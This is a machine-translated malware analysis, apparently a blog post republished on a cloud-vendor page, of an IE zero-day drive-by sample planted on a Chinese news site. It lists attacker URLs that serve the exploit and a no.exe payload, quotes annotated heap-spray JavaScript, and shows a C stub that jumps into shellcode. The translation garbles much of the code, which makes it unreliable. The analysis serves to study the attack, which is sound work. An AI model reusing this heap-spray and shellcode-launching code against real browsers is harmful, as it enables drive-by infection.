Ie0dayCVE0806 network horse sample analysis

Last Update:2013-11-29 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

[Title]: Ie0dayCVE0806 network horse sample analysis
[Author]: Quan Ge (http://riusksk.blogbus.com)

Analysis tools:

MDecoder 0.66

Edit Plus 3.01

FreShow

Vvc 6.0

Ollydb g 1.10
Sample Source:

Web site (Anhui News Network) implanted by hackers Trojan http://log.mtian.net /? P = 1152001
Analysis result:
Log By Mdecoder

[Root] http://www.ah.chinanews.com.cn/GuestBook/Images/con.wtxlj871/wenda./lpt9.mqhna976.asp (Changan car how about this stock? What will happen in the future? -- Stock --)

[Exp] http://1029a9.3322.org: 225/yy2/index.htm (Exploit. Ie0dayCVE0806.)

[Script] http://1029a9.3322.org: 225/yy2/mj. js

[Virus] http://231ad.3322.org: 225/yy2/no.exe

[Exp] http://1029a9.3322.org: 225/yy2/index.htm (Exploit. Ie0dayCVE0806.)

[Exp] http://1029a9.3322.org: 225/yy2/index.htm (Exploit. Ie0dayCVE0806.)

[Script] http://js.160ads.com/ I .js

[Script] http://js.160ads.com/+s (sr) +

[Iframe] http://js.160ads.com/+s (sr) +
Code Analysis:
Trojans:

Exploit code analysis:
Index.htm:

");

}

// -->

// Set the hide button

// Hanging malicious script http://1029a9.3322.org: 225/yy2/mj. js

Mj. js:

Function auc2 (){

A3 = new Array (); // create an array object Array, and these dynamically applied objects/variables will be allocated to the heap.

Var a5 = 0x86000-(a4.length * 2); // 536KB minus the number of shellcode bytes, mainly used to calculate the number of bytes required for each injection block in addition to shellcode. nop is used to fill in

Var LFlwBa = unescape (% u0c0c % u0c0c );

While (LFlwBa. length

LFlwBa + = LFlwBa; // fill each injection block with 0c0c0c0c except shellcode

};

Var a6 = LFlwBa. substring (0, a5/2 );

Delete LFlwBa;

For (I = 0; I <270; I ++ ){

A3 [I] = a6 + a6 + a4; // fill the memory with a series of injection blocks including shellcode to implement heap spary

}

}

Shellcode Analysis

First, remove the connector "+" from the shellcode part, and then use FreShow to execute ESC decoding:

...... Omitted content ...... XEAxEAxEAxEAxEAxEAxEA

Use VC to write the following code:

Int main ()

{

Char shellcode [] = "Export xbcxe4x55xf2xbfxbdxbdx5fx44x3cx51xbdxbcxbdxbdxbdx36x61 ...... Omitted content ...... Success ";

_ Asm {

Lea eax, shellcode

Push eax

Ret

}

Return 0;

}

Compile it into a program with VC, then load the reverse analysis with OD, F8 to shellcode and then:

0012 FBAC 58 POP EAX

0012 FBAD 58 POP EAX

0012 FBAE 58 POP EAX

0012 FBAF 58 POP EAX

0012FBB0 EB 10

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

Ie0dayCVE0806 network horse sample analysis

Contact Us

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support